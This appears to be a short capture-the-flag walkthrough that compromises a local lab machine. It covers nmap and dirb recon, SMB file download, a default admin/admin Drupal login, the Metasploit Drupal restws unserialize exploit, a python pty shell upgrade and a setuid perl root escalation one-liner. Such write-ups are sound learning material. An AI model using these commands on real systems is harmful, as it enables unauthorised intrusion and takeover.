Using nmap-A –T4 –p- 192.168.1.13 –vv

Running dirb :

As we can see in nmap scan, port 139 and 445 are open so let’s exploit them:

Let’s connect to smb service using smbclient \\\\192.168.1.13\\naruto:

Now we download the text file, we use: get uzumaki.txt

Well with some luck I tried different names as path and the one that worked out is gara, and I can log in as admin and password also admin.

Now the host is using Drupal 8 as we can see:

Searching searchsploit for Drupal 8 came with :

So now we going to use metasploit and search for drupal unserialize : use exploit/unix/webapp/drupal_restws_unserialize


And we have a shell, lets break out of it by python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Changed directory to home and found two users narato and yashika , the user yashika has a file perl, which we can use it to escalate our privilege to root.

Simply we can type ./perl -e ‘use POSIX (setuid); POSIX::setuid(0); exec “/bin/bash”;’
And then if you id you can see you are root, navigate to the root directory and read the final.txt file and you are done
